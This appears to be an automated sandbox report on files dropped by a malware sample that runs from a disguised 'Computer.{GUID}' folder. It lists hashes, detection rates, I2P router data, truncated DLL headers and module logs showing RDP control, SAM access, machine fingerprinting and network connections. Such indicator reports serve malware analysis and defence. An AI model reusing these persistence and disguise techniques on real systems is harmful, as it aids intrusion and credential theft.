                                                                                                                                                SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                                                                                                                                                SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                                                                                                                                                SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.606056825540447
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:6TELO4RGAwjfyDuJra3T6p7ZdFFphN4yKuWEp2/N6:6TESTzOx+p7Zjx3A/A
                                                                                                                                                MD5:BB7115DCC8A875F5FE525E0BCBB8598E
                                                                                                                                                SHA1:2C6172818B3FE892023C7E4BA7DB452DDEAF5460
                                                                                                                                                SHA-256:0D69E40BDED9B383911AC3D5872191974A95AF3AEF78F67ADC05F2FB3BE55BF2
                                                                                                                                                SHA-512:F64C3DD8DA7F977CA5E285570DC3DD59D28FB95BAE67BBF19A945396527C3C189ABEEFF9560CEF7F61A02B617E16E721F155DE1CD6C1D11845B77FDD186CD7F5
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.557821836618357
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:SpiPTEJTsq+/EbVJsratqMu3Nhj2FZ+EhKivEY:SQPTEpCe4AIXvEAivl
                                                                                                                                                MD5:D83C021597EEBCE39A95DFF1C978100B
                                                                                                                                                SHA1:64C0BB0741323CB6CE1048A46252316382E79DAB
                                                                                                                                                SHA-256:2935B87EF7E254010083DB699D50F599B4D61D0800AE42D910EDF742B2004AB2
                                                                                                                                                SHA-512:0506658136A793DE61261954DDF2443C9E6AF8413CCE2B58F105FCA171069BB045E9CEABE5502799F230F2EAC0138700D19067B96DC7A7B4C54E2F59A9E87B2E
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.587937094214244
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:gMLxkJAdkLPHqf+9A4sdRwOZuL4VeXhf7f2JFvSau+OG:JSKdwfqW9A4Ac9VqJpSaCG
                                                                                                                                                MD5:946780F5391EDFB85103F7861B78C282
                                                                                                                                                SHA1:887C3F962BBC12145850B60989121D18A5FD2438
                                                                                                                                                SHA-256:59FD827654BAE1B69DB59D0D7B3624B78515DF2DCEA153E98403F1424721B302
                                                                                                                                                SHA-512:8E04FF1007D54796B6A5BDAC273B3F9F87999884B3AF7C839A6B5302EFD914145C64185E0164DDFDC386FD1BA0C8C4B1925D56E0AC3393D5EEF0784E02F1EEDB
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512
                                                                                                                                                Entropy (8bit):7.565338382383913
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:Fx4I7MQFTy/clewppYxzhuI00nYUmgowIFhYTeJwUTj7o1W:4I7MQVy/cppYNbtnwgoHFh+ChTj7o1W
                                                                                                                                                MD5:9694810F5F86A5D5357E28095DB53639
                                                                                                                                                SHA1:B8E1E90A832A73382CC45DDC0E5014A4B59DB612
                                                                                                                                                SHA-256:AE631F9FE96E6C303BC0F424377BF548D9FB44B5D5C2868885CB1D35E77DD472
                                                                                                                                                SHA-512:B76BB6D608D0AC5EF764A4B7208B2448BB54BAEE45FBC3AC07D3196592AA9F85F4DD90B12717058EF468C20EC4856D525830D0F65E14AA08C502D67CC9C8FCE2
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):80
                                                                                                                                                Entropy (8bit):6.137492001110314
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:yM7FGtnf+3M1mcxGF3JtEiG:Z733Mcb3EiG
                                                                                                                                                MD5:40426B272F5F9746E475BC60587E4AD5
                                                                                                                                                SHA1:F444EE94302C2B1DC47C2875DEE4DC9DE54FC894
                                                                                                                                                SHA-256:A46845BE312BD7F0AC0D287569C1BB86821D57A4ACC0DDA179C4DA43E7CC82D1
                                                                                                                                                SHA-512:E5A80DCAD147B0AFC2BB4EA427E2E9A7DDF8F0132891EF34AC312AFAC8E41F5D754DB14EEB635E0589C426AE00EF17A26BE3612333090ED0810736843DD6DA60
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:8...!..8.'+1...i.S...LB.........d..X...{w..&.t.%..#`..]....FTY.({.......#
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):721
                                                                                                                                                Entropy (8bit):6.6765125652697055
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:r1MTqqqqqqqqqP6Msy/pznnL8JVmyaEoIEPiGv:rOTqqqqqqqqqP6MNBnmDov
                                                                                                                                                MD5:42981CD0425487F54154988A1FC6B498
                                                                                                                                                SHA1:D36FB7BF6AA80984CB3909B597EE01FFB6F6EB4A
                                                                                                                                                SHA-256:D5B0E5DBF32DB3BBFA12E1A479180309FE99573EE1B2E532BB420161BA9564C0
                                                                                                                                                SHA-512:315D97F3E9487D89ED18BB3AB7D7567BF399A9054ADCB857A924944F6BA107C1D5F154CD3DD4933135B22663E25B4E2FDF811A6D77836B1EA5C6993C2D5EEA06
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:......i>......*J...uO....T{...{..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M..0...K.2. .=.|...4.}.<....@M.C..7.B..eR~V.j}......I..:.'.............7.jX...........NTCP2.@.caps=.4;.s=,OPT11aEh9O04xL8nKzGntN6kadNT9A2DTEKOHMCqBR4=;.v=.2;..........SSU2.q.caps=.4;.i=,6NZ1ZUF0XzTJH4T9cNRX54Q9rWEJlXWb8iDjDcznlS8=;.s=,w0jflIrRnNICclGsvmO-E8wPKLuMcSjXPoeraOMSiH8=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.60;.`.`U"&..}.=.Gm..F.MbJ'..uB......@n....!@.+....A;N..r..u...
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):455
                                                                                                                                                Entropy (8bit):6.138550964074035
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:r1UngzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIlGgzZIl8:r1MTqqqqqqqqqP6MzeFF
                                                                                                                                                MD5:EA558EA4FD7C9A9750DB5F528838FF11
                                                                                                                                                SHA1:1FF39A749C41A19EBB9DF74CCFED128A91F7960D
                                                                                                                                                SHA-256:24E1BF74C03FBE8D48F23DBA3433F5740C22E471D9DFE343C39404888B928ECB
                                                                                                                                                SHA-512:FD388535E0C6B20203F8CAB0264D125B31E08A200720CC8437730D22417E2679D0F6B6798FB830A7F0409CDDD8C55C22242F1177CF85DFC73E363765A7E0B18D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):96
                                                                                                                                                Entropy (8bit):6.207205599611886
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:xk5bStwYfhtBkYqJUI0gFYbRKQr0CwK:xk9SBkYqJggFYb840K
                                                                                                                                                MD5:20B2B98A967C49662C19ABED42EBDB9D
                                                                                                                                                SHA1:804C454104D85770EE003433C7E879E4CD709DA6
                                                                                                                                                SHA-256:4254DD0702BD9A7F3C25936D1B0FD65183AC7BCBF873201F02932C11AD25F036
                                                                                                                                                SHA-512:CDC0261D8FD72805573C4E7E5E1B8763027BD374E1C49252801DA5010BD63454D453159C0D271FCFE786C8203F4A39266FD8E167BE0293FA6A138DACBFA1CC87
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9146880
                                                                                                                                                Entropy (8bit):6.674868432808522
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
                                                                                                                                                MD5:676064A5CC4729E609539F9C9BD9D427
                                                                                                                                                SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
                                                                                                                                                SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
                                                                                                                                                SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):89088
                                                                                                                                                Entropy (8bit):6.205377670389132
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:y5rUJUohYhdi9PbahfxaxQo9uYN/kpYBbMQGwryimzgvmak7EoKk1dhJJY9V/Sbf:digoZax39NN/DBgQVmzg5kF/ctIN
                                                                                                                                                MD5:BB070CFBD23A7BC6F2A0F8F6D167D207
                                                                                                                                                SHA1:BDB8961F8AFB999AECE60BF1EF3E49E8E2349F7B
                                                                                                                                                SHA-256:C0860366021B6F6C624986B37B2B63D460DD78F657FC504E06F9B7ABBFDC2565
                                                                                                                                                SHA-512:93D052675636FBE98204EF8521B9F10F8A0CBCAC40E8835AD8249DAFD833C29B7F915A898671B21064D4ED6D04DA556D9D3647D03EB93232ADB2ACD2D7DC1F8A
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4379
                                                                                                                                                Entropy (8bit):5.3537078850672035
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHwW8J9VLyHzHH0H20HaSHomHu5SHSkmHSm5SHFmHOn5SHvSHhOmHX5SHpPR1zs:AzOTuTn0W06SLO5Suz5Skc5SPS/35SJM
                                                                                                                                                MD5:C6401B39F275E4F2BC3540EEBE96AEC6
                                                                                                                                                SHA1:30FB5AEFF27A4DDA562C94C7AAE85C5F57D8C212
                                                                                                                                                SHA-256:8BE17A7F07D957415F37B26F29D3EA82D412F4B50A70A6167689E794BB015F62
                                                                                                                                                SHA-512:CAA510C4E00E2BD5302CB65FF181DF27DC466FCCC030E9265760218E6ECE30BA3E2299417C5EE51280B5336FAC4D1792D09CCFFB97C26A52C142047B50684C88
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log)..[I] (debug_init) -> Done..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[E] (package_install) -> Failed(pkg_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,tgt_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\,err=00000003)..[I] (fs_file_read) -> Done(path=C:\Users\Public\Computer.{20d04fe0-3
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\shdpeqdz2a54sj46ur0.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):456
                                                                                                                                                Entropy (8bit):3.2341395630162877
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:Ml8Pi7t8+d/fQfjfEWNfElsfghFfShFfgmSem4emzYWr:k8APd/oj8i8ls0FSFgID7r
                                                                                                                                                MD5:40AB00517F4227F2C3C334F1D16B65B4
                                                                                                                                                SHA1:F8D57AF017E2209B4FB24122647FD7F71B67C87C
                                                                                                                                                SHA-256:4BAF4B78D05A28AF7DEE7DBBCE2B4EDF6053D9239C1756C932BE9F2FEEE4EF85
                                                                                                                                                SHA-512:75D74306F043B864295F09A60C19A43494C226664733C99318989CE5C22CB9395BB407FB5C8C0268AD9184A79813304ED5FC943A6B53DB54F5F225CDA31650E3
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}..D:AI(D;;FA;;;BU)(A;;FA;;;BA)(A;OICIID;FA;;;BA)(A;ID;FA;;;SY)(A;OICIIOID;FA;;;CO)(A;OICIIOID;FA;;;SY)(A;OICIID;0x1301ff;;;IU)(A;OICIID;0x1301ff;;;SU)(A;OICIID;0x1301ff;;;S-1-5-3)..
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):105984
                                                                                                                                                Entropy (8bit):6.285421743969757
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:BQrD6CCk73WUJ/2WEvooF8VohjBdmaKqYdpFXaRQSCYA8CSs8qgu06wCYA8CSs8V:BA6sDl/2WEvo0DipFXaRQO
                                                                                                                                                MD5:6E01ED70D02CE47F4D27762A9E949DEE
                                                                                                                                                SHA1:32B9199EBBD7891CF0091B96BF3B2C9303AB7B7A
                                                                                                                                                SHA-256:EFB9B3D4356071EE8FE66979140E7435371EC668088A68786C6FDCEDF29D7376
                                                                                                                                                SHA-512:B21C8F79553EE513F6C48EFA618C20FB82CBC77EDE95579C28C21D8BB433B93D108CEF442B48ECBDABD0B06AA5C8AEDC8B26316167D1793A0E972B38D4210854
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4940
                                                                                                                                                Entropy (8bit):5.29136499790954
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHuN8J9VLr70He5555555555o55555555555555D:AONOTf70+5555555555o55555555555h
                                                                                                                                                MD5:49656B68BFF8175EBB4C7DCF41B24478
                                                                                                                                                SHA1:C3DF786695550FF65525BB954B10D2A020DDBD7D
                                                                                                                                                SHA-256:06C8EFD08247B4B3B616B805E4002E559BF6E48F855B3111FC9E48DF442B5616
                                                                                                                                                SHA-512:669EA6862D911F3B4962FCC47703A7DD3FC21A5AA83E3CD3C7341DBACE02D95A30831CE4618BA12D4E94ACFDE910B828C538B9D6370DA07E254A9859A663F46E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8ba4fa8a0)..[I] (tcp_connect) -> Done(sock=0x3c0,host=7
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):129536
                                                                                                                                                Entropy (8bit):6.2852879161990645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:UmeFYyUJdEqzx2LVJ4ngXsNXGRqnbxeGqS/h0E0P3j4NBtRLBhBr:UZUJdhxCJ4ngg46weh0dr4vnV
                                                                                                                                                MD5:88E6178B0CD434C8D14710355E78E691
                                                                                                                                                SHA1:F541979CAD7EE7C6D8F2B87A0F240592A5DC1B82
                                                                                                                                                SHA-256:7B40349481AD6C522A23FB3D12D6058EC0A7C5B387348FB4AE85135EE19C91A4
                                                                                                                                                SHA-512:C4330A9EE1E69785420AABCFD1991AAAEB0F1764EB7E857F0C86161F61E1FFD467B458A2D458D3C55BB76D00F26FAC481D026443AB0796D0AEF38BF06CD84B8F
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4753
                                                                                                                                                Entropy (8bit):5.4440687959784535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:idHeN8J9VLoDNVDNVDN2DNVDNVDNVDNVDNVDNVDNVDNVDNVDND:A+NOTePPIPPPPPPPPPD
                                                                                                                                                MD5:196434F541505FEC30FD2275A3151AD2
                                                                                                                                                SHA1:43FFE2BEB86F3772D577ED7FAD4C7974F1213C82
                                                                                                                                                SHA-256:A7E9A3EA3F86531FDD310F71C6F32D36641EB7C21F8C27D3317ADBE5FF36EF2F
                                                                                                                                                SHA-512:CE8CBF6FA409D424AA1137E5E5005CE3589EF46C05E230683403503A236D224E7DBF59D1A45AE7369781E8C62EBEF9E9F1435E7E28F645A642308781348AAB22
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (scm_init) -> Done..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (proxy_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b919
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):2.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:9:9
                                                                                                                                                MD5:006F29D8E822B9241020AEC2495EF819
                                                                                                                                                SHA1:6510BEB08A14B6BCC74D32031C1B19AA07169CF1
                                                                                                                                                SHA-256:69FF245F90727BBEFA5B1F82E2429FF74F31A6A5385B5129A2FE3378DCF200F1
                                                                                                                                                SHA-512:16916BC4477F6FC1AE1132D2F5D2B9587650DC44E23DE15E0FE787AFE23175E0E236C020C753BA5158F688BEACDA523AAFB7EC1DF82B6F7619573C90A48742E8
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:wgNj
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):37376
                                                                                                                                                Entropy (8bit):5.7181012847214445
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:2aS6Ir6sXJaE5I2IaK3knhQ0NknriB0dX5mkOpw:aDjDtKA0G0j5Opw
                                                                                                                                                MD5:E3E4492E2C871F65B5CEA8F1A14164E2
                                                                                                                                                SHA1:81D4AD81A92177C2116C5589609A9A08A5CCD0F2
                                                                                                                                                SHA-256:32FF81BE7818FA7140817FA0BC856975AE9FCB324A081D0E0560D7B5B87EFB30
                                                                                                                                                SHA-512:59DE035B230C9A4AD6A4EBF4BEFCD7798CCB38C7EDA9863BC651232DB22C7A4C2D5358D4D35551C2DD52F974A22EB160BAEE11F4751B9CA5BF4FB6334EC926C6
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........qc..qc..qc......qc...`..qc...g..qc..qb..qc...b..qc...f..qc...c..qc...j..qc......qc...a..qc.Rich.qc.................PE..d...#............." .....Z...>.......]...............................................a....`A.........................................~..........@...............................\... x..T............................p...............q..P............................text....Y.......Z.................. ..`.rdata.......p.......^..............@..@.data...P............z..............@....pdata...............|..............@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):115712
                                                                                                                                                Entropy (8bit):6.25860377459178
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:+8zEo3EM0MBfGCqx22eMO4HROUeS2qjVO+n98TLmifu:LzEms12D4xOU31n98TLmh
                                                                                                                                                MD5:BD1D98C35FE2CB3E14A655AEDE9D4B01
                                                                                                                                                SHA1:49361C09F5A75A4E2D6E85FBDA337FC521770793
                                                                                                                                                SHA-256:961C65CFDF0187A945AD6099EFD9AF68D46D36EC309A2243F095EF739EE9AC7E
                                                                                                                                                SHA-512:74BFD70A08E2CB86AF10B83D0CFD723A24613C9E6E2018CDC63BD425D45845C1214BF68115E04F95572684F27A0CF52D271E2419F8056E0A0467B88507D132D4
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........................................P.......p....`... .........................................^....................................@..p...............................(...................X................................text...8...........................`..`.data........0......."..............@....rdata..pi...@...j...$..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..p....@......................@..B........................................................................................................................................................................
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12514
                                                                                                                                                Entropy (8bit):5.33408248494771
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:CFdHr+54yclD8cm9FLQIhs5ZR5mLU5+sR5HR5OKXbem5ZR5mLU5+sR5HR5OKXbeY:idHxN8J9VLjvvuvvvvvvvvvD
                                                                                                                                                MD5:94A7B22F4F218FD48101B2FA3B0D7B79
                                                                                                                                                SHA1:C078E2C913C9E2BF233B69A0C63C23290A4DFEA2
                                                                                                                                                SHA-256:99A7F1976DCB1B5C7980CFDB43025B069EC97DCDAC8DC3DA083B752A7787C4B3
                                                                                                                                                SHA-512:99781CEB5AAA844AA5E24AED13EE0679DA8CEE639AACB0621D75E810F1A664B24998C0BF03414A55CE36783454FA03A714A4602B81E4A50D9DE82046D46EC6BB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ff8c8850000)..[D] (module_get_proc) -> Done(hnd=0x00007ff8c8850000,name=RtlGetVersion,ret=0x00007ff8c888e520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=934d772a)..[I] (sys_init) -> Done(sys_uid=c76a8f08934d772a,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (sam_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ff8b915e342)..[I] (tcp_connect) -
                                                                                                                                                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):91136
